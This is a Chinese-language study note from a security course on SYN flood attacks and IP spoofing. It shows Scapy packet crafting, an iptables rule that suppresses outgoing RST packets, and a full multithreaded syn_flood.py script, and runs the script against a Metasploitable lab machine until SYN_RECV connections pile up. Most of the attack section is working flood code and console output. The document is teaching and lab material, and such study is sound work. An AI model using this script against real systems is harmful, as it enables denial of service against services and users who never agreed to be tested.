【安全牛学习笔记】Syn-Flood、IP地址欺骗
来源:互联网 发布:freebsd 在线安装软件 编辑:程序博客网 时间:2024/05/29 11:26
Syn-Flood
长伴随IP欺骗
- 真正的攻击目标
Scapy
- i=IP()
- i.dst=1.1.1.1
- i.display()
- t=TCP()
- srl(i/t,verbose=1,timeout=3)
- sr1(IP(dst=1.1.1.1)/TCP())
msfadmin@metasploitable:~$ ifconfig
root@K:~# scapy()
INFO: Can't import python gnuglot wrapper . won't be able to plot.
WARNING: NO route found for IPV6 destination :: (no default route?)
welcome to Scapy (2.3.2)
>>> exit()
root@K:~# apt-get install python gnuplot
root@K:~# scapy
WARNING: NO route found for IPV6 destination :: (no default route?)
welcome to Scapy (2.3.2)
>>> i=iP
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 127.0.0.1
dst= 127.0.0.1
\options\
>>> i.dst="192.168.1.110"
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 192.168.1.109
dst= 192.168.1.110
\options\
>>> t=TCP()
>>> t.display()
###[ TCP ]###
sport= ftp_data
dport= http
seq= 0
ack= 0
dataofs= None
reserved= 0
flags= S
window= 8192
chksum= None
urgptr= 0
options= {}
>>> t.dport=22
>>> t.display
###[ TCP ]###
sport= ftp_data
dport= ssh
seq= 0
ack= 0
dataofs= None
reserved= 0
flags= S
window= 8192
chksum= None
urgptr= 0
options= {}
>>>srl(i/t,verbose=1,timeout=2)
Begin emission:
Finished to send 1 packets.
Received 2 packets, got 1 answers, remaining 0 packets
<IP version= 4L ihl=5L tos= 0x0 len=44 id= 1 flags=DF frag=OL ttl= 64 proto= tcp chksum=0xb6a0 src= 192.168.1.110 dst= 192.168.1.109 options=[] |<TCP sport= ssh dport=ftp_data seq=3703105205 ack= 1 dataofs= 6L reserved=OL flags=SA window=5840 chksum=0x397d urgptr= 0 options= {('MSS',1460)} |<Padding load='\x00\x00' |>>>
wireshark
ip.addr eq 192.168.1.110
Syn-Flood
攻击脚本:./syn_flood.py
- iptables -A OUTPUT -p tcp --tcp-flags RST -d 1.1.1.1 -j DROP
- netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}'
- windows系统默认半开连接数10个
LISTENS服务器端口处于侦听状态,等待连接请求SYN-SENTC发起连接请求,等待对端响应SYN-RECVS已收到连接请求ESTABLISHED C/S三次握手成功,TCP连接已经建立FIN-WAIT-1 C/S等待对端响应中断请求确认,或对端终端请求FIN-WAIT-2 C/S等待对端发送中断请求 CLOSE-WAITC/S等待本地 进程/用户 关闭连接 CLOSINGC/S等待对端响应连接中断确认 LAST-ACK C/S等待对端响应之前的连接中断确认TIME-WAITC/S等待足够时间长度确保对端收到连接中断确认(最大4分钟) CLOSEDC/S无任何连接状态root@K:~# iptables -A OUTPUT -p tcp --tcp-flags RST -d 192.168.1.110 -j DROP
root@K:~# iptable -L
Chain INPUT (policy ACCEPT)
target port opt source destination
Chain FPRWARD (policy ACCEPT)
target port opt source destination
Chain OUTPUT (policy ACCEPT)
target port opt source destination
DROP tcp -- anywhere 192.168.1.110 tcp flags:RST/RST
root@K:~# cp /media/sf_D_DRIVE/脚本/syn_flood.py . //拷贝到当前目录
root@K:~# ls
Desptop Downloads Pictures sys_flood.py Videos
Documents Music public Templates
root@K:~# geany syn_flood.py
------------------------------------------------------------
#!/usr/bin/python
# .*. coding: utf-8 -*
from scapy.all import *
from time import sleep
import thread
import random
import logging
logging.getLogger("scapy.runtime").setLevel(Logging.ERROR)
if len(sys.argv) != 4:
print "用法: ./syn_flood.py [IP地址] [端口] [线程数]"
print "举例: ./syn_flood.py 1.1.1.1 80 20"
sys.exit()
target = str(sys.argv[1])
port = int(sys.argv[2])
threads = int(sys.argv[3])
print "正在执行 SYN flood 攻击,按 Ctrl+C 停止攻击."
def synflood(target,port):
while 0 == 0
x = random.randint(0,65535)
send(IP(dst=target)/TCP(dport=port,sport=x),verbose=0)
for x in range(0,threads):
thread.start_new_thread(synflood, (target,port))
while 0 == 0
sleep(1)
------------------------------------------------------------
root@K:~# ./syn_flood.py
WARNING: No route found for IPV6 destination :: (no default route?)
用法: ./syn_flood.py [IP地址] [端口] [线程数]
举例: ./syn_flood.py 1.1.1.1 80 20
root@K:~# ./syn_flood.py 192.168.1.110 22 200
root@K:~# ssh msfadmin@192.168.1.110
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
RSA key fingerprint is SHA256:BQHM5EoHx9GCi0LuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.
msfadmin@192.168.1.110's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individal files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY , to the exten permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail,
last login: Thu Jun 16 07:25:55 2016
msfadmin@metasploitable:~$ exit
logout
Conection to 192.168.1.110 closed.
root@K:~# ssh msfadmin@192.168.1.110
msfadmin@metasploitable:~$ sudo netstat -n
msfadmin@metasploitable:~$ sudo netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}'
SYN_RECV 254
C:\> net user yuanfh 123
root@K:~# openvas-stop
Stopping Openvas Services
root@K:~# rdestop 192.168.1.111
root@K:~# netstat -pantu | more
IP地址欺骗
经常用于Dos攻击
根据IP头地址寻址
- 伪造IP源地址
边界路由器过滤
- 入站、出站
受害者可能是源、目的地址
绕过基于地址的验证
压力测试模拟多用户
上层协议(TCP序列号)
- 【安全牛学习笔记】Syn-Flood、IP地址欺骗
- 拒绝服务介绍、DoS分类、个人DoS分类方法, Syn-Flood、IP地址欺骗
- NET平台下的IP欺骗和SYN Flood攻击
- SYN Flood
- SYN Flood
- SYN-Flood
- syn flood
- SYN Flood
- SYN Flood
- syn flood
- syn flood
- syn flood
- SYN Flood
- SYN flood
- IP地址欺骗
- SYN Flood和SYN cookie
- SYN Flood 工具源码
- SYN Flood 攻击
- java 数据库 一JDBC基础知识
- 2. Add Two Numbers
- POJ3294-Life Forms
- CS231n学习笔记--12.Visualizing and Understanding
- Android进阶四:Databinding的使用(基础篇)
- 【安全牛学习笔记】Syn-Flood、IP地址欺骗
- 基于顺序栈的基本操作的实现
- 总结(2017年上)
- css动画
- Ubuntu 下安装配置 Jenkins
- 合作协同进化算法概述(Cooperative Coevolution)
- 南阳理工oj 746 整数划分(四) 区间dp
- 微信测试号首次开发总结
- python 列表推导式